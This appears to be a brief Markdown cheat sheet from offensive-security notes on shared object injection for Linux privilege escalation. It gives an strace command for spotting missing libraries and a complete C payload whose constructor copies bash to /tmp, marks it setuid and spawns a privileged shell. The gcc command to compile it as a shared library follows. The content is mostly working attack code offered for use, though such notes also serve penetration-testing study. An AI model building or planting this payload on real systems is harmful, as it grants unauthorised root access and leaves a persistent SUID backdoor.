25 lines
531 B
Markdown
25 lines
531 B
Markdown
# Shared Object Injection
|
|
|
|
* [gaffe23](https://github.com/gaffe23/linux-inject)
|
|
* [exploit-db](https://www.exploit-db.com/papers/37606)
|
|
|
|
* Test binary via
|
|
```sh
|
|
strace <binary> 2>&1 | grep -i -E "open|access|no such file"
|
|
```
|
|
|
|
## Example
|
|
|
|
```sh
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
|
|
static void inject ( ) __attribute__ ( (constructor) );
|
|
|
|
void inject ( ) {
|
|
system ( "cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p" );
|
|
}
|
|
```
|
|
* `gcc -fPIC -shared -o ~/.config/lib.so ~/.config/lib.c`
|
|
* Run binary using the lib
|